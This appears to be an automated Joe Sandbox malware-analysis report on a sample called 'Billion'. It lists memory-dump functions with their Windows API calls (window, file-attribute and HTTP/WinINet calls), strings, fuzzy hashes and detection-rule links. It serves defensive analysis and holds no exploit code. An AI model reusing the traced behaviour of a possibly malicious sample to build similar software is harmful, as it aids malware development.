                                                                                                                                                                                                                                                                                                          • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0019ABA8,?,00000001), ref: 0019BBE4
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2156557900-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 40089dbbd139bcaada26e5d44a604599fcb1b8a3dcb37c72f2d6d2c7c5eebd94
                                                                                                                                                                                                                                                                                                          • Instruction ID: 423a79d2b8c171dd77d499e182084d8db94d92d26f4a2e829487cf02096799d4
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40089dbbd139bcaada26e5d44a604599fcb1b8a3dcb37c72f2d6d2c7c5eebd94
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09315EB2908304AFDF14AB14FEC9F797BAAAB44316F118015FB06A61E5D774E980CB60
                                                                                                                                                                                                                                                                                                          Function 00162FF3 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00163007
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00162D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0016DB51,00201DC4,00000000,00201DC4,00000000,?,0016DB78,00201DC4,00000007,00201DC4,?,0016DF75,00201DC4), ref: 00162D4E
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00162D38: GetLastError.KERNEL32(00201DC4,?,0016DB51,00201DC4,00000000,00201DC4,00000000,?,0016DB78,00201DC4,00000007,00201DC4,?,0016DF75,00201DC4,00201DC4), ref: 00162D60
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00163013
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0016301E
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00163029
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00163034
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0016303F
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0016304A
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00163055
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00163060
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0016306E
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 1834f0cae2cb6a16ace0d44c24806b27d198fde048485f756f61629394d6ee26
                                                                                                                                                                                                                                                                                                          • Instruction ID: 192402e8cf6bb5390f9eee01d733c3b422c12ece62dd95c996ab8b9a8c690cb3
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1834f0cae2cb6a16ace0d44c24806b27d198fde048485f756f61629394d6ee26
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9115676510508BFCB01EF94CD42DDD3BA5EF16390B9145A5FA08DF222DB32EE619B90
                                                                                                                                                                                                                                                                                                          Function 00132AB0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00132AF9
                                                                                                                                                                                                                                                                                                          • OleUninitialize.OLE32(?,00000000), ref: 00132B98
                                                                                                                                                                                                                                                                                                          • UnregisterHotKey.USER32(?), ref: 00132D7D
                                                                                                                                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 00173A1B
                                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 00173A80
                                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00173AAD
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                                                                                                                                                          • String ID: close all
                                                                                                                                                                                                                                                                                                          • API String ID: 469580280-3243417748
                                                                                                                                                                                                                                                                                                          • Opcode ID: a6fb325640d6a4b6e5c268ab4588f5537e7f904215d36b8dacbe415248b9d77e
                                                                                                                                                                                                                                                                                                          • Instruction ID: 990f825f209bf1fb997377a3682793e82a1c033490a85f51b582a41a37993813
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a6fb325640d6a4b6e5c268ab4588f5537e7f904215d36b8dacbe415248b9d77e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FD17A31701212DFCB29EF54C89AA69F7B0BF14714F1142ADE95AAB261CB30EE12DF40
                                                                                                                                                                                                                                                                                                          Function 001A8835 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 001A89F2
                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 001A8A06
                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 001A8A30
                                                                                                                                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 001A8A4A
                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 001A8A5C
                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 001A8AA5
                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 001A8AF5
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                                                                                                                                                          • API String ID: 769691225-438819550
                                                                                                                                                                                                                                                                                                          • Opcode ID: 0a14e5fdb7e6e29c4fd47c27e75e97ac06598500537929859c6cf1e9b57a61c4
                                                                                                                                                                                                                                                                                                          • Instruction ID: 230afe95ea19adadd891f0c8411407251c45ff2695ff2aec0de24d0a63748965
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a14e5fdb7e6e29c4fd47c27e75e97ac06598500537929859c6cf1e9b57a61c4
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E781AEB69043459BCB24EF14C444ABBB7E8BF9A314F58482EF885D7250EF34E945CB92
                                                                                                                                                                                                                                                                                                          Function 001C88F9 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 193windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • IsWindow.USER32(00000000), ref: 001C8992
                                                                                                                                                                                                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 001C899E
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 001C8A79
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,000000B0,?,?), ref: 001C8AAC
                                                                                                                                                                                                                                                                                                          • IsDlgButtonChecked.USER32(?,00000000), ref: 001C8AE4
                                                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(00000000,000000EC), ref: 001C8B06
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 001C8B1E
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                                                          • API String ID: 4072528602-2181176062
                                                                                                                                                                                                                                                                                                          • Opcode ID: 6dc877ea9c0022a562dcaf01393866cb5ef2306727cbdf4ff0f35d419a55183f
                                                                                                                                                                                                                                                                                                          • Instruction ID: 43b421b2453d20ed05c2ae9563617a18ad7d46dbd448af737da51ce88e5d362f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6dc877ea9c0022a562dcaf01393866cb5ef2306727cbdf4ff0f35d419a55183f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB718A74600204AFEB25DF54C8C5FBABBB9EF6A304F14045EE855A7261CB31ED84DB61
                                                                                                                                                                                                                                                                                                          Function 00137447 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000EB), ref: 001374D7
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00137567: GetClientRect.USER32(?,?), ref: 0013758D
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00137567: GetWindowRect.USER32(?,?), ref: 001375CE
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00137567: ScreenToClient.USER32(?,?), ref: 001375F6
                                                                                                                                                                                                                                                                                                          • GetDC.USER32 ref: 00176083
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00176096
                                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 001760A4
                                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 001760B9
                                                                                                                                                                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 001760C1
                                                                                                                                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00176152
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                                                                                                                                                          • String ID: U
                                                                                                                                                                                                                                                                                                          • API String ID: 4009187628-3372436214
                                                                                                                                                                                                                                                                                                          • Opcode ID: 725b8836e8d596c8332084263419131b75d71da6a28db071084a2ecb48167714
                                                                                                                                                                                                                                                                                                          • Instruction ID: 06f16814856fe94d99a7ece9879e4604641bd2964df54113dac064c025155932
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 725b8836e8d596c8332084263419131b75d71da6a28db071084a2ecb48167714
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D671BF71500605EFCF258F64DC88AAA7FB5FF89320F24866AFD595A1A6C731DC80DB60
                                                                                                                                                                                                                                                                                                          Function 001ACC98 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 001ACCB7
                                                                                                                                                                                                                                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001ACCDF
                                                                                                                                                                                                                                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 001ACD0F
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 001ACD67
                                                                                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 001ACD7B
                                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 001ACD86
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3113390036-3916222277
                                                                                                                                                                                                                                                                                                          • Opcode ID: d04cbbaa3edcd77627b8025fae9107334baefdaadcf6e8b41baa02f5e3214dd0
                                                                                                                                                                                                                                                                                                          • Instruction ID: 568b3ceb52e338c2d346d4e0170b290491074c63eaa46c393fc22fab94881c6e
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d04cbbaa3edcd77627b8025fae9107334baefdaadcf6e8b41baa02f5e3214dd0
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D319FB9500708AFD721AFA49C88EAB7FFCEB46744B10452EF44A93600DB34DD449BE1
                                                                                                                                                                                                                                                                                                          Function 0019A215 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,001755AE,?,?,Bad directive syntax error,001CDCD0,00000000,00000010,?,?), ref: 0019A236
                                                                                                                                                                                                                                                                                                          • LoadStringW.USER32(00000000,?,001755AE,?), ref: 0019A23D
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013B329: _wcslen.LIBCMT ref: 0013B333
                                                                                                                                                                                                                                                                                                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0019A301
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                                                                                                                                          • API String ID: 858772685-4153970271
                                                                                                                                                                                                                                                                                                          • Opcode ID: 48bce3c56f68b3a7946c7c8eabaab8af81e8a389db3685c9a058aba9d137c25f
                                                                                                                                                                                                                                                                                                          • Instruction ID: c5b298377dc984c977b80bc888d7df8f938ae7d22e4b988cf43dabd4354ab742
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48bce3c56f68b3a7946c7c8eabaab8af81e8a389db3685c9a058aba9d137c25f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C21913190021EFFCF01AFA0CC46EEE7B39BF28304F444469F605650A2EB71A658DB51
                                                                                                                                                                                                                                                                                                          Function 001929EC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetParent.USER32 ref: 001929F8
                                                                                                                                                                                                                                                                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00192A0D
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00192A9A
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ClassMessageNameParentSend
                                                                                                                                                                                                                                                                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                                                                                                          • API String ID: 1290815626-3381328864
                                                                                                                                                                                                                                                                                                          • Opcode ID: 8a18c7edc3ef8398a15b9624749f8ce373bdeca11adde7639a394e3d21fe86f8
                                                                                                                                                                                                                                                                                                          • Instruction ID: ad4dbc081ee984c94f292df1e23c0df67c9c5a0c188a95493a46930a811bf0a3
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a18c7edc3ef8398a15b9624749f8ce373bdeca11adde7639a394e3d21fe86f8
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B911E97B74430BBAFE286720EC07DA67BAD9F25729B200026FA05E64D1FB75A8854614
                                                                                                                                                                                                                                                                                                          Function 00137567 Relevance: 13.8, APIs: 9, Instructions: 291COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0013758D
                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 001375CE
                                                                                                                                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 001375F6
                                                                                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0013773A
                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0013775B
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Rect$Client$Window$Screen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1296646539-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: f9f0c153e0c15d6d8b944cc2d2f4d3ba8ecfddd49953a52d59e5f06712120e44
                                                                                                                                                                                                                                                                                                          • Instruction ID: 61ba30f235d53292610ad337479ef8c442aa13b796721383d3426b638da7e3af
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9f0c153e0c15d6d8b944cc2d2f4d3ba8ecfddd49953a52d59e5f06712120e44
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1C16CB990465AEFDB24CFA8C544BEDBBF1FF18310F14841AE899E3290D734A951DB60
                                                                                                                                                                                                                                                                                                          Function 0016D210 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
